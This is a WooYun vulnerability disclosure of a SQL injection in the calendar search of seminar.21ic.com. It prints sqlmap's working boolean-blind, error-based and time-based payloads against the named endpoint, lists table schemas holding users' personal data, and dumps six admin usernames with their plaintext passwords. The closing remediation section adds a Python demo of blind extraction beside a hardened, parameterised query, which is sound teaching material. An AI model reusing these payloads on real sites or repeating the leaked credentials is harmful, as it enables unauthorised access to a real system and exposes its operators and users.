Vulnerability summary

Defect ID: wooyun-2014-080306

Title: High-risk SQL injection at a large China electronics portal could leak the entire database

Affected vendor: 中国电子网 (21ic.com)

Author: 路人甲

Submitted: 2014-10-22 11:06

Fix deadline: 2014-12-06 11:08

Published: 2014-12-06 11:08

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 20

Status: vendor could not be reached, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2014-10-22: Actively contacting the vendor and waiting for it to claim the report; details withheld from the public
2014-12-06: The vendor has actively ignored the vulnerability; details disclosed to the public

Summary:

High-risk SQL injection at a large China electronics portal # full database leak

Details:

High-risk SQL injection at a large China electronics portal # full database leak
A sub-site has a POST-based injection.

Proof of vulnerability:

Injection point: http://seminar.21ic.com:80/vod/byTime (POST)
searchType=CALENDAR&searchName=wYpP&month=1&year=2007&button=%E6%9F%A5%E8%AF%A2
sqlmap identified the following injection points with a total of 857 HTTP(s) requests:
---
Place: POST
Parameter: year
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE)
    Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' RLIKE IF(6802=6802,2007,0x28) AND 'rYzJ'='rYzJ&button=%E6%9F%A5%E8%AF%A2

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND (SELECT 1594 FROM(SELECT COUNT(*),CONCAT(0x7170726371,(SELECT (CASE WHEN (1594=1594) THEN 1 ELSE 0 END)),0x7177706f71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'HLTl'='HLTl&button=%E6%9F%A5%E8%AF%A2

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind (comment)
    Payload: searchType=CALENDAR&searchName=Rssj&month=1&year=2007' AND SLEEP(5)#&button=%E6%9F%A5%E8%AF%A2
---
back-end DBMS: MySQL 5.0
available databases [2]:
[*] 21ic_seminar
[*] information_schema
Database: 21ic_seminar
[28 tables]
+------------------+
| YiiLog           |
| user             |
| admin            |
| admin_action     |
| announce         |
| bulletin         |
| c_promotion      |
| change_award     |
| chat             |
| corp             |
| customer         |
| email_view       |
| inquire          |
| inquire_answer   |
| inquire_item     |
| inquire_question |
| join_meeting     |
| link             |
| link_click       |
| meeting          |
| meeting_cate     |
| meeting_pre      |
| mirror           |
| signup_meeting   |
| sqlmapoutput     |
| temp_user        |
| user_point       |
| user_promotion   |
+------------------+
Database: 21ic_seminar
Table: temp_user
[11 columns]
+------------+--------------+
| Column     | Type         |
+------------+--------------+
| address    | varchar(250) |
| city       | varchar(50)  |
| corp       | varchar(250) |
| email      | varchar(250) |
| industrial | varchar(250) |
| mobile     | varchar(50)  |
| postcode   | varchar(50)  |
| province   | varchar(50)  |
| tel        | varchar(250) |
| truename   | varchar(250) |
| username   | varchar(250) |
+------------+--------------+
Database: 21ic_seminar
Table: admin
[4 columns]
+----------------+--------------+
| Column         | Type         |
+----------------+--------------+
| admin_id       | int(11)      |
| admin_name     | varchar(50)  |
| admin_password | varchar(250) |
| admin_priv     | tinyint(4)   |
+----------------+--------------+
Database: 21ic_seminar
Table: user
[28 columns]
+-----------------+---------------------+
| Column          | Type                |
+-----------------+---------------------+
| address         | varchar(250)        |
| auth_code       | varchar(50)         |
| auth_date       | datetime            |
| auth_email      | varchar(150)        |
| auth_ip         | varchar(50)         |
| auth_web        | varchar(150)        |
| bbs_sync        | tinyint(3) unsigned |
| bbs_user_id     | int(11)             |
| c_pr_id         | int(11)             |
| city            | varchar(50)         |
| corp            | varchar(250)        |
| department      | varchar(250)        |
| email           | varchar(250)        |
| filter          | int(11)             |
| industrial      | varchar(250)        |
| is_auth         | tinyint(3) unsigned |
| is_auth_check   | tinyint(3) unsigned |
| is_auth_lock    | int(11)             |
| mobile          | varchar(50)         |
| postcode        | varchar(50)         |
| promotion_point | int(11)             |
| province        | varchar(50)         |
| responsibility  | varchar(50)         |
| tel             | varchar(250)        |
| truename        | varchar(250)        |
| update_date     | datetime            |
| user_id         | int(11)             |
| username        | varchar(250)        |
+-----------------+---------------------+
Database: 21ic_seminar
Table: admin
[6 entries]
+-------------+
| admin_name  |
+-------------+
| admin       |
| karen       |
| Seminar21ic |
| test001     |
| xufang      |
| yqg         |
+-------------+
Database: 21ic_seminar
Table: admin
[6 entries]
+-------------+------------------+
| admin_name  | admin_password   |
+-------------+------------------+
| admin       | Seminar_2121     |
| karen       | karen800316      |
| Seminar21ic | 2014_Seminar_Jyx |
| test001     | 21iccom          |
| xufang      | XUFANG20140521   |
| yqg         | yqg*2013         |
+-------------+------------------+

Remediation:

Filter the input: `year` and `month` should be validated as integers (anything else rejected) and passed to the query as bound parameters instead of being concatenated into the SQL string. The admin passwords recovered above are stored in plaintext; they should be stored as salted hashes.
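The vulnerable pattern implied by the sqlmap output above (the `year` field concatenated into the WHERE clause) next to its hardened form, as an added example written for this page; it is not the 21ic.com application's code, whose source is not public. The `meeting` table schema and rows are constructed, and SQLite stands in for MySQL, so the MySQL-only `RLIKE ... IF()` payload is replaced by a `SUBSTR()` comparison that every dialect accepts. `blind_extract` shows what sqlmap's boolean-based blind technique automates: recovering the constructed `admin` password character by character from nothing more than whether the calendar search returns rows.

```python
"""Boolean-based blind SQL injection in a year/month calendar search:
the vulnerable pattern beside its hardened form.

Added example for this report, not code from seminar.21ic.com. The
`meeting` schema and its rows are constructed; the `admin` row mirrors the
report's dump. SQLite stands in for MySQL, so the MySQL-only RLIKE/IF()
payload from the sqlmap output is replaced with a SUBSTR() comparison.
"""
import sqlite3
import string


def make_db():
    """In-memory stand-in for the 21ic_seminar database (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE meeting (meeting_id INTEGER, title TEXT, year INTEGER, month INTEGER);
        CREATE TABLE admin (admin_id INTEGER, admin_name TEXT, admin_password TEXT);
        INSERT INTO meeting VALUES (1, 'Embedded systems seminar', 2007, 1);
        INSERT INTO meeting VALUES (2, 'Power design seminar', 2007, 3);
        INSERT INTO admin VALUES (1, 'admin', 'Seminar_2121');
    """)
    return conn


def by_time_vulnerable(conn, year, month):
    """The pattern the report implies: form fields concatenated straight into
    the WHERE clause. Returns the matching meeting ids (what the page shows)."""
    sql = ("SELECT meeting_id FROM meeting WHERE year='" + year
           + "' AND month='" + month + "'")
    return [row[0] for row in conn.execute(sql)]


def blind_extract(conn, subquery, max_len=32):
    """Recover the single-value result of `subquery` one character at a time,
    using only the true/false difference in the vulnerable endpoint's output.
    This is what sqlmap's boolean-based blind technique automates."""
    charset = string.ascii_letters + string.digits + "_*-@."
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in charset:
            # The trailing AND 'a'='a consumes the original closing quote, so
            # the query stays valid; rows come back only when the guess is right.
            payload = f"2007' AND SUBSTR(({subquery}),{pos},1)='{ch}' AND 'a'='a"
            if by_time_vulnerable(conn, payload, "1"):
                recovered += ch
                break
        else:
            break  # no character matched at this position: end of the value
    return recovered


def by_time_hardened(conn, year, month):
    """Same search with the two fixes: typed validation and bound parameters.
    Raises ValueError for anything that is not an in-range integer."""
    try:
        y, m = int(year), int(month)
    except (TypeError, ValueError):
        raise ValueError("year and month must be integers") from None
    if not (1970 <= y <= 2100 and 1 <= m <= 12):
        raise ValueError("year or month out of range")
    rows = conn.execute(
        "SELECT meeting_id FROM meeting WHERE year=? AND month=?", (y, m))
    return [row[0] for row in rows]


def hardened_rejects(conn, year, month):
    """True if the hardened handler refuses the input."""
    try:
        by_time_hardened(conn, year, month)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = make_db()
    print(by_time_vulnerable(db, "2007' AND 'a'='a", "1"))  # [1]: condition true
    print(by_time_vulnerable(db, "2007' AND 'a'='b", "1"))  # []: condition false
    print(blind_extract(db, "SELECT admin_password FROM admin WHERE admin_name='admin'"))  # Seminar_2121
    print(hardened_rejects(db, "2007' AND 'a'='a", "1"))  # True
```

The time-based payload in the report (`AND SLEEP(5)#`) works the same way with response latency in place of row presence, which is why even an endpoint that renders nothing is still exploitable. One more thing worth reading from the dump: the `sqlmapoutput` table is sqlmap's own scratch table, created when it runs stacked queries, so the database had already been written to by an earlier sqlmap session before this report was filed.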

Copyright notice: please credit 路人甲@乌云 (WooYun) when reposting


Vulnerability response

Vendor response:

Vendor could not be reached, or the vendor actively refused the report

Vulnerability Rank: 4 (WooYun assessment)